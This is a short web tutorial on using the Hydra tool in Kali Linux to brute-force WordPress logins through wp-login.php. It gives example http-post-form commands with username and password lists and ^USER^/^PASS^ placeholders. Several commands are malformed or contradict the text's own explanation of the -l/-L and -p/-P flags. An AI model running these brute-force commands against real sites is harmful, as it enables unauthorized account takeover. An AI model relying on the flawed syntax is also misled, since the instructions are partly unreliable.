BOOK THIS SPACE FOR AD
ARTICLE ADHydra is a tool in kali used for brute-forcing a dictionary list or a txt file with passwords remember hydra is used over an ip or url
The command follows as
Hydra -L v.txt -P v.txt http-post-form <ip> “ wp-login.php: burp command till log in: response from the user and pass column if u give some thing in both column”
-L is used for list of txt file if you find the random usr name for example admin then use small l for brute-forcing.
-P is used for list of txt file if you find the random password for example admin then use small p for brute-forcing.
Hydra -p admin -p admin http-post-form <ip> “ wp-login.php: burp command till log in: response from the user and pass column if u give some thing in both column”
Now the “ data “ in these semi columns follows for loop like logic in programming .
Hydra -l admin -p admin http-post-form <ip> “ /wp-login.php: log=^USER^&pwd=^PASS^&wp-submit= Log+in: invalid username ”